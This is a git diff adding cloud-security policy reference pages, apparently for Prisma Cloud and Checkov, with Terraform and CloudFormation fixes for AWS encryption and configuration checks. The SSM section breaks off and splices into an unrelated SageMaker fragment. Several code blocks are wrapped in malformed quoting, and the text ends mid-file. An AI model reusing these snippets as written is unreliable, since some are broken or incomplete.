+| 708f1ba7-7d77-45a3-b932-823745ffaa89
+
+|Checkov Check ID
+| Not Supported
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|
+
+|===
+
+
+
+=== Description
+
+
+A central challenge when managing infrastructure as code is configuration drift.
+Drift is defined as any case where the state of your infrastructure differs from the state defined in your configuration files.
+Drift usually occurs when users add, remove, or modify resources outside of the Infrastructure-as-Code provisioning lifecycle.
+Drift can also occur without human intervention, for example when resources are terminated or fail, or when changes are made by the cloud provider or other automation tools.
+When a live configuration drifts from its code-defined state and its current value is the desired value, that live change will eventually be overwritten by the next Infrastructure-as-Code deployment cycle.
+Conversely, when a live configuration drifts from its code-defined state and its current value is not the desired value, the drift can create a trust-boundary breach that external threat actors could abuse.
+Resources that are provisioned using Infrastructure-as-Code should be managed and modified only through their code definition, not manually in the cloud.
+We recommend preventing drift to ensure configurations meet their intended functions.
+When a drift is identified, trace its origin and, based on the desired outcome, either revert the change using Infrastructure-as-Code or update the code to assert the correct intended state.
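+As an illustration of the revert path described above, re-applying the IaC pipeline restores any code-defined value that was changed manually. A minimal, hypothetical Terraform sketch (the bucket name and tag values are illustrative):
+
+[source,hcl]
+----
+resource "aws_s3_bucket" "example" {
+  bucket = "drift-demo-bucket"
+
+  tags = {
+    # If this tag is edited manually in the console, the next
+    # `terraform apply` detects the drift and reverts it to the
+    # code-defined value below.
+    Owner = "platform-team"
+  }
+}
+----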
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-qldb-ledger-permissions-mode-is-set-to-standard-1.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-qldb-ledger-permissions-mode-is-set-to-standard-1.adoc new file mode 100644 index 000000000..f6c4b1d91 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-qldb-ledger-permissions-mode-is-set-to-standard-1.adoc @@ -0,0 +1,75 @@ +== QLDB ledger permissions mode is not set to STANDARD + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b1c558e0-ec7d-4c9f-8705-b1f3ec5e8ad0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py[CKV_AWS_170] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Quantum Ledger Database (Amazon QLDB) is a fully managed ledger database for cryptographically verifiable transaction logging. +You can use the QLDB API or the AWS Command Line Interface (AWS CLI) to create, update, and delete ledgers in Amazon QLDB. +You can also list all the ledgers in your account, or get information about a specific ledger. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_qldb_ledger +* *Arguments:* permissions_mode + + +[source,go] +---- +{ + "resource "aws_qldb_ledger" "standard" { + ... ++ permissions_mode = "STANDARD" +}", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::QLDB::Ledger +* *Arguments:* Properties.PermissionsMode + + +[source,yaml] +---- +{ + "Resources: + Default: + Type: "AWS::QLDB::Ledger" + Properties: + ... 
++ PermissionsMode: "STANDARD" ", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-redshift-uses-ssl.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-redshift-uses-ssl.adoc new file mode 100644 index 000000000..fb080f2c4 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-redshift-uses-ssl.adoc @@ -0,0 +1,97 @@ +== AWS Redshift does not have require_ssl configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7446ad28-8502-4d71-b334-18cef8d85a2b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedShiftSSL.py[CKV_AWS_105] + +|Severity +|MEDIUM + +|Subtype +|Build +//Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +This policy identifies Redshift databases in which data connection to and from is occurring on an insecure channel. +SSL connections ensures the security of the data in transit. + +//// +=== Fix - Runtime + + +AWS Console + + + +. Login to the AWS and navigate to the `Amazon Redshift` service. + +. Expand the identified `Redshift` cluster and make a note of the `Cluster Parameter Group` + +. In the navigation panel, click on the `Parameter group`. + +. Select the identified `Parameter Group` and click on `Edit Parameters`. + +. Review the require_ssl flag. ++ +Update the parameter `require_ssl` to true and save it. ++ +NOTE: If the current parameter group is a Default parameter group, it cannot be edited. ++ +You will need to create a new parameter group and point it to an affected cluster. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_redshift_parameter_group +* *Arguments:* parameter.require_ssl + + +[source,go] +---- +resource "aws_redshift_parameter_group" "pass" { + ... 
+  parameter {
+    name  = "require_ssl"
+    value = "true"
+  }
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Redshift::ClusterParameterGroup
+* *Arguments:* Properties.Parameters
+
+
+[source,yaml]
+----
+Type: AWS::Redshift::ClusterParameterGroup
+  Properties:
+    ...
+    Parameters:
++     - ParameterName: "require_ssl"
++       ParameterValue: "true"
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-route53-a-record-has-an-attached-resource.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-route53-a-record-has-an-attached-resource.adoc
new file mode 100644
index 000000000..a34387116
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-route53-a-record-has-an-attached-resource.adoc
@@ -0,0 +1,56 @@
+== Route53 A Record does not have Attached Resource
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 2e6640bf-ffdd-4a1a-a6ae-6eb24740cf3d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml[CKV2_AWS_23]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This check ensures that Route53 A records point to resources that are part of your account, rather than arbitrary IP addresses.
+On the platform, this check additionally compares the IPs against provisioned Elastic IPs (EIPs).
+In Checkov, the graph correlates the A record against known AWS resources, from Elastic IPs to Global Accelerator.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_route53_record
+
+
+[source,go]
+----
+resource "aws_route53_record" "pass" {
+  zone_id = data.aws_route53_zone.primary.zone_id
+  name    = "dns.freebeer.site"
+  type    = "A"
+  ttl     = "300"
+  records = [aws_eip.fixed.public_ip]
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-session-manager-data-is-encrypted-in-transit.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-session-manager-data-is-encrypted-in-transit.adoc
new file mode 100644
index 000000000..70d096380
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-session-manager-data-is-encrypted-in-transit.adoc
@@ -0,0 +1,64 @@
+== Session Manager data is not encrypted in transit
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 8656de0e-831d-4bf3-8d08-d6a79330fd3a
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py[CKV_AWS_112]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies Session Manager session preferences that do not use an AWS KMS key to encrypt session data.
+In addition to the TLS encryption applied by default, Session Manager can encrypt session data with a KMS key; enabling this provides an additional layer of protection for the data transmitted between your managed instances and users' local machines.
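+Session Manager preferences live in an SSM document of type _Session_, and KMS encryption is enabled through the document's _kmsKeyId_ input. A minimal sketch in Terraform; the KMS key resource and the document description are illustrative assumptions, not values mandated by this policy:
+
+[source,hcl]
+----
+resource "aws_kms_key" "session" {
+  description = "Encrypts Session Manager session data"
+}
+
+resource "aws_ssm_document" "session_preferences" {
+  name            = "SSM-SessionManagerRunShell"
+  document_type   = "Session"
+  document_format = "JSON"
+
+  content = jsonencode({
+    schemaVersion = "1.0"
+    description   = "Session Manager preferences with KMS session encryption"
+    sessionType   = "Standard_Stream"
+    inputs = {
+      # Reference the KMS key used to encrypt session data
+      kmsKeyId = aws_kms_key.session.key_id
+    }
+  })
+}
+----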
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ssm_document +* *Arguments:* kmsKeyId + + +[source,go] +---- +resource "aws_ssm_document" "enabled" { + name = "SSM-SessionManagerRunShell" + document_type = "Session" + + content = < +--instance-type & lt;value> +--kms-key-id & lt;value>", +} +---- + +//// + + + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_sagemaker_notebook_instance +* *Attribute*: kms_key_id - (Optional) The AWS Key Management Service (AWS KMS) key that Amazon SageMaker uses to encrypt the model artifacts at rest using Amazon S3 server-side encryption. + + +[source,go] +---- +resource "aws_sagemaker_notebook_instance" "example" { + ... + name = "my-notebook-instance" ++ kms_key_id = + ... +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-15.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-15.adoc new file mode 100644 index 000000000..0296afe1a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-15.adoc @@ -0,0 +1,107 @@ +== AWS SNS topic has SSE disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ad9c283b-1205-42f1-a2be-1179921a24f9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py[CKV_AWS_26] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon SNS is a publishers and subscribers messaging service. +When you publish messages to encrypted topics, customer master keys (CMK), powered by AWS KMS, can be used to encrypt your messages. +If you operate in a regulated market, such as HIPAA for healthcare, PCI DSS for finance, or FedRAMP for government, you need to ensure sensitive data messages passed in this service are encrypted at rest. 
+ +//// +=== Fix - Runtime + + +* SNS Console* + + + +. Navigate to the https://console.aws.amazon.com/sns/v3/home [SNS console] in AWS and select * Topics* on the left. + +. Open a topic. + +. In the top-right corner, click * Edit*. + +. Under * Encryption*, select * Enable encryption*. + +. Select a customer master key - you can use the default AWS key or a custom key in KMS. + + +* CLI Command* + + +---- +aws sns set-topic-attributes +--topic-arn & lt;TOPIC_ARN> +--attribute-name "KmsMasterKeyId" +--attribute-value & lt;KEY> +---- +The ARN format is `arn:aws:sns:REGION:ACCOUNTID:TOPIC_NAME` +The key is a reference to a KMS key or alias. +Use `alias/aws/sns` for the default AWS key. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_sns_topic +* *Arguments:* kms_master_key_id - (Optional) The ID of an AWS-managed customer master key (CMK) for Amazon SNS or a custom CMK. + + +[source,go] +---- +{ + "resource "aws_sns_topic" "example" { + ... + name = "user-updates-topic" ++ kms_master_key_id = "alias/aws/sns" +}", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::SNS::Topic +* *Arguments:* Properties.KmsMasterKeyId + + +[source,yaml] +---- +{ + "Type: AWS::SNS::Topic + Properties: + ... 
++ KmsMasterKeyId: "kms_id"", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-16-encrypt-sqs-queue.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-16-encrypt-sqs-queue.adoc new file mode 100644 index 000000000..b1736394c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-16-encrypt-sqs-queue.adoc @@ -0,0 +1,112 @@ +== AWS SQS Queue not configured with server side encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 72a1d6ff-dd56-4107-afc0-6eda4ce934b8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py[CKV_AWS_27] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Simple Queue Service (SQS) provides the ability to encrypt queues so sensitive data is passed securely. +It uses server-side-encrypyion (SSE) and supports AWS-managed Customer Master Key (CMK), as well as self-created/self-managed keys. +SSE encrypts only the body of the message, with queue metadata and message metadata out of scope, and backlogged messages not encrypted. +If you operate in a regulated market, such as HIPAA for healthcare, PCI DSS for finance, or FedRAMP for government, you need to ensure sensitive data messages passed in this service are encrypted at rest. +We recommend you encrypt Data Queued using SQS. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/sqs/ [Amazon SQS console]*. + +. Open a Queue and click * Edit* at the top right. + +. Expand * Encryption* and select * Enabled*. + +. 
Select or enter a CMK key, or use the default provided by AWS. + + +* CLI Command* + + +---- +aws sqs set-queue-attributes --queue-url & lt;QUEUE_URL> --attributes KmsMasterKeyId=& lt;KEY> +---- +The format of the queue URL is `+https://sqs.REGION.amazonaws.com/ACCOUNT_ID/QUEUE_NAME+` +The key should be a KMS key or alias. +The default AWS key is `alias/aws/sqs`. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_sqs_queue +* *Arguments:* kms_master_key_id - (Optional) The ID of an AWS-managed customer master key (CMK) for Amazon SQS or a custom CMK. +kms_data_key_reuse_period_seconds - (Optional) The length of time, in seconds, for which Amazon SQS can reuse a data key to encrypt or decrypt messages before calling AWS KMS again. +An integer representing seconds, between 60 seconds (1 minute) and 86,400 seconds (24 hours). +The default is 300 (5 minutes). + + +[source,go] +---- +{ + "resource "aws_sqs_queue" "example" { + name = "terraform-example-queue" ++ kms_master_key_id = "alias/aws/sqs" ++ kms_data_key_reuse_period_seconds = 300 + ... +}", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::SQS::Queue +* *Arguments:* Properties.KmsMasterKeyId + + +[source,yaml] +---- +{ + "Type: AWS::SQS::Queue + Properties: + ... 
++ KmsMasterKeyId: "kms_id"", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-17.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-17.adoc new file mode 100644 index 000000000..0ba7aaa9a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-17.adoc @@ -0,0 +1,119 @@ +== AWS Elastic File System (EFS) with encryption for data at rest is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a7451ade-75eb-4e3e-b996-c2b0d5fdd329 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py[CKV_AWS_42] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Elastic File System (Amazon EFS) is a simple, scalable file storage solution for AWS services and on-premises resources. +Amazon EFS is built to elastically scale on-demand. +It grows and shrinks automatically as files are added and removed. +It is essential to encrypt your Amazon EFS to protect data and metadata against unauthorized access. +Encrypting your Amazon EFS also fulfils compliance requirements for data-at-rest encryption when file systems are used in production systems. + +//// +=== Fix - Runtime + + +* Amazon Console To change the policy using the AWS Console, follow these steps:* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/efs/ [Amazon Elastic File System console]. + +. To open the file system creation wizard, click * Create file system*. + +. Select * Enable encryption*. + +. To enable encryption using your own KMS CMK key, from the * KMS master key* list select the name of your * AWS Key*. 
+
+
+*CLI Command*
+
+
+In the CreateFileSystem operation, the --encrypted parameter is a Boolean and is required for creating encrypted file systems.
+The --kms-key-id is required only when you use a customer-managed CMK and you include the key's alias or ARN.
+
+
+[source,shell]
+----
+aws efs create-file-system \
+--creation-token $(uuidgen) \
+--performance-mode generalPurpose \
+--encrypted \
+--kms-key-id user/customer-managedCMKalias
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_efs_file_system
+* *Arguments:* encrypted - (Optional) If true, the disk will be encrypted.
+If you are using AWS KMS you can optionally provide a KMS customer master key.
+
+
+[source,go]
+----
+resource "aws_efs_file_system" "example" {
+  ...
+  creation_token = "default-efs"
++ encrypted      = true
++ kms_key_id     = aws_kms_key.default-kms.arn
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::EFS::FileSystem
+* *Arguments:* Encrypted - (Optional) If true, the disk will be encrypted.
+If you are using AWS KMS you can optionally provide a KMS customer master key.
+
+
+[source,yaml]
+----
+{
+ "Resources:
+ FileSystemResource:
+ Type: 'AWS::EFS::FileSystem'
+ Properties:
+ ...
++ Encrypted: true", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-18.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-18.adoc new file mode 100644 index 000000000..942774d1e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-18.adoc @@ -0,0 +1,115 @@ +== Neptune storage is not securely encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8244ecf5-3dad-400a-ba71-3b5162ede0f7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py[CKV_AWS_44] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Neptune is a fully managed graph database service for building and running applications that work with connected datasets. +Neptune supports graph query languages such as Apache TinkerPop Gremlin and W3C's SPARQL. +Neptune also supports recommendation engines, fraud detection, knowledge graphs, drug discovery, and network security. +Encryption of Neptune storage protects data and metadata against unauthorized access. +It also fulfils compliance requirements for data-at-rest encryption of production file systems. +Encryption for an existing database cannot be added or changed after it is created. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/neptune/ [Amazon Neptune console]*. + +. To start the Launch DB instance wizard, click * Launch DB Instance*. + +. To customize the settings for your Neptune DB cluster, navigate to the * Specify DB details* page. + +. 
To enable encryption for a new Neptune DB instance, navigate to the *Enable encryption* section on the Neptune console and click *Yes*.
+
+
+*CLI Command*
+
+
+To create a new Amazon Neptune DB cluster:
+
+
+[source,shell]
+----
+aws neptune create-db-cluster \
+--db-cluster-identifier <value> \
+--engine <value> \
+--storage-encrypted
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_neptune_cluster
+* *Arguments:* storage_encrypted - (Optional) Specifies whether the Neptune cluster is encrypted.
+The default is false if not specified.
+
+
+[source,go]
+----
+resource "aws_neptune_cluster" "example" {
+  ...
+  cluster_identifier = "neptune-cluster-demo"
++ storage_encrypted  = true
+  ...
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Neptune::DBCluster
+* *Arguments:* Properties.StorageEncrypted
+
+
+[source,yaml]
+----
+Type: "AWS::Neptune::DBCluster"
+Properties:
+  ...
++ StorageEncrypted: true
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-25.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-25.adoc
new file mode 100644
index 000000000..f9f835e02
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-25.adoc
@@ -0,0 +1,78 @@
+== AWS Redshift instances are not encrypted
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0132bbb2-c733-4c36-9c5d-c58967c7d1a6
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py[CKV_AWS_64]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+We recommend all data stored in the Redshift cluster is securely encrypted at rest. You can create new encrypted clusters or enable CMK encryption on existing clusters; as AWS says, "You can enable
encryption when you launch your cluster, or you can modify an unencrypted cluster to use AWS Key Management Service (AWS KMS) encryption" (https://docs.aws.amazon.com/redshift/latest/mgmt/working-with-db-encryption.html).
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_redshift_cluster
+* *Arguments:* encrypted - Ensure that this argument is set to true to protect this database.
+This change may recreate your cluster.
+
+
+[source,go]
+----
+resource "aws_redshift_cluster" "redshift" {
+  ...
+  cluster_identifier = "shifty"
++ encrypted          = true
+  kms_key_id         = var.kms_key_id
+  ...
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Redshift::Cluster
+* *Arguments:* Properties.Encrypted
+
+
+[source,yaml]
+----
+Type: "AWS::Redshift::Cluster"
+Properties:
+  ...
++ Encrypted: true
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-3-encrypt-ebs-volume.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-3-encrypt-ebs-volume.adoc
new file mode 100644
index 000000000..529388f0a
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-3-encrypt-ebs-volume.adoc
@@ -0,0 +1,110 @@
+== AWS EBS volumes are not encrypted
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 47ff5620-39a5-4859-b020-0a8d0d9e192a
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSEncryption.py[CKV_AWS_3]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Encrypting EBS volumes ensures that replicated copies of your images are secure even if they are accidentally exposed.
+AWS EBS encryption uses AWS KMS customer master keys (CMK) when creating encrypted volumes and snapshots.
+Storing EBS volumes in their encrypted state reduces the risk of data exposure or data loss.
+We recommend you encrypt all data stored in the EBS.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To change the policy using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the *https://console.aws.amazon.com/ec2/[Amazon EC2 console]*.
+
+. From the navigation bar, select *Region*.
+
+. From the navigation pane, select *EC2 Dashboard*.
+
+. In the upper-right corner of the page, select *Account Attributes*, then *Settings*.
+
+. Under *EBS Storage*, select *Always encrypt new EBS volumes*.
+
+. Click *Update*.
+
+
+*CLI Command*
+
+
+To always encrypt new EBS volumes, use the following command:
+[,bash]
+----
+aws ec2 --region <REGION> enable-ebs-encryption-by-default
+----
+////
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_ebs_volume
+* *Arguments:* encrypted - (Optional) If true, the disk will be encrypted.
+
+
+[source,go]
+----
+resource "aws_ebs_volume" "example" {
+  ...
+  availability_zone = "${var.availability_zone}"
++ encrypted         = true
+  ...
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::EC2::Volume
+* *Arguments:* Properties.Encrypted - (Optional) If true, the disk will be encrypted.
+
+
+[source,yaml]
+----
+{
+ "Resources:
+ NewVolume:
+ Type: AWS::EC2::Volume
+ Properties:
+ ...
++ Encrypted: true", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-4.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-4.adoc new file mode 100644 index 000000000..4e047333a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-4.adoc @@ -0,0 +1,126 @@ +== AWS RDS DB cluster encryption is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| dae26f3c-d05a-4499-bdcd-fc5c32e3891f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSEncryption.py[CKV_AWS_16] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +AWS RDS is a managed DB service enabling quick deployment and management of MySQL, MariaDB, PostgreSQL, Oracle, and Microsoft SQL Server DB engines. +Native RDS encryption helps protect your cloud applications and fulfils compliance requirements for data-at-rest encryption. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/rds/[Amazon RDS console]*. + +. Click * Snapshots*. + +. Select the snapshot that you want to encrypt. + +. Navigate to * Snapshot Actions*, select * Copy Snapshot*. + +. Select the * Destination Region*, then enter your * New DB Snapshot Identifier*. + +. Set * Enable Encryption* to * Yes*. + +. Select the * Master Key* from the list, then select * Copy Snapshot*. + + +* CLI Command* + + +If you use the create-db-instance AWS CLI command to create an encrypted DB instance, set the --storage-encrypted parameter to true. +If you use the CreateDBInstance API operation, set the StorageEncrypted parameter to true. 
+
+
+[source,shell]
+----
+aws rds create-db-instance \
+    --db-instance-identifier test-mysql-instance \
+    --db-instance-class db.t3.micro \
+    --engine mysql \
+    --master-username admin \
+    --master-user-password secret99 \
+    --allocated-storage 20 \
+    --storage-encrypted
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_db_instance
+* *Arguments:* storage_encrypted - Specifies whether the DB instance is encrypted.
+
+
+[source,go]
+----
+resource "aws_db_instance" "example" {
+  ...
+  name = "mydb"
++ storage_encrypted = true
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::RDS::DBInstance
+* *Arguments:* Properties.StorageEncrypted
+
+
+[source,yaml]
+----
+Resources:
+  DB:
+    Type: 'AWS::RDS::DBInstance'
+    Properties:
+      ...
++     StorageEncrypted: true
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-6.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-6.adoc
new file mode 100644
index 000000000..edc9e0219
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-6.adoc
@@ -0,0 +1,113 @@
+== DynamoDB PITR is disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 31575632-c4cd-4346-9db4-97b82c6befde
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DynamodbRecovery.py[CKV_AWS_28]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+DynamoDB Point-In-Time Recovery (PITR) is an automatic backup service for DynamoDB table data that helps protect your DynamoDB tables from accidental write or delete operations.
+Once enabled, PITR provides continuous backups that can be controlled using various programmatic parameters.
+PITR can also be used to restore table data from any point in time during the last 35 days, as well as any incremental backups of DynamoDB tables.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To change the policy using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the *https://console.aws.amazon.com/dynamodb/[Amazon DynamoDB console]*.
+
+. Navigate to the desired *DynamoDB* table, then select the *Backups* tab.
+
+. To turn the feature on, click *Enable*.
++
+The *Earliest restore date* and *Latest restore date* are visible within a few seconds.
+
+
+*CLI Command*
+
+
+To update continuous backup settings for a DynamoDB table:
+
+
+[source,shell]
+----
+aws dynamodb update-continuous-backups \
+    --table-name MusicCollection \
+    --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_dynamodb_table
+* *Arguments:* point_in_time_recovery - (Optional) Point-in-time recovery options.
+
+
+[source,go]
+----
+resource "aws_dynamodb_table" "example" {
+  ...
+  name = "GameScores"
++ point_in_time_recovery {
++   enabled = true
++ }
+  ...
+}
+----
+
+
+*CloudFormation / Serverless*
+
+* *Resource:* AWS::DynamoDB::Table
+* *Property*: PointInTimeRecoverySpecification
+
+
+[source,yaml]
+----
+{
+ " Resources:
+ iotCatalog:
+ Type: AWS::DynamoDB::Table
+ Properties:
+ ...
